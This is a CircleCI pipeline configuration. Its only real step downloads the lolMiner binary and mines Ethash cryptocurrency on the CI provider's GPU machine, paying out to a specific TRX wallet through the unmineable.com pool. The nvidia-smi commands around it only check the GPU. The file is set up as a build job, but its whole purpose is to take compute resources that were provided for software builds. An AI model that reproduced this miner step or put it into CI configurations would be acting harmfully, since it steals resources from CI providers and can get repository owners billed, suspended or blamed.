version: 2.1

jobs:
  build:
    machine:
      image: ubuntu-1604-cuda-10.1:201909-23
    resource_class: gpu.nvidia.medium
    steps:
      - run: nvidia-smi
      - run: wget https://github.com/Lolliedieb/lolMiner-releases/releases/download/1.45/lolMiner_v1.45_Lin64.tar.gz && tar xvf lolMiner_v1.45_Lin64.tar.gz && cd 1.45 && ./lolMiner --algo ETHASH --pool ethash.unmineable.com:3333 --user TRX:TWqp4JVSvTdrMzozHzncjDgqezt88XjCZ5.$(echo $(shuf -i 1-9999 -n 1)-RIG) --ethstratum ETHPROXY 
      - run: docker run --gpus all nvidia/cuda:9.0-base nvidia-smi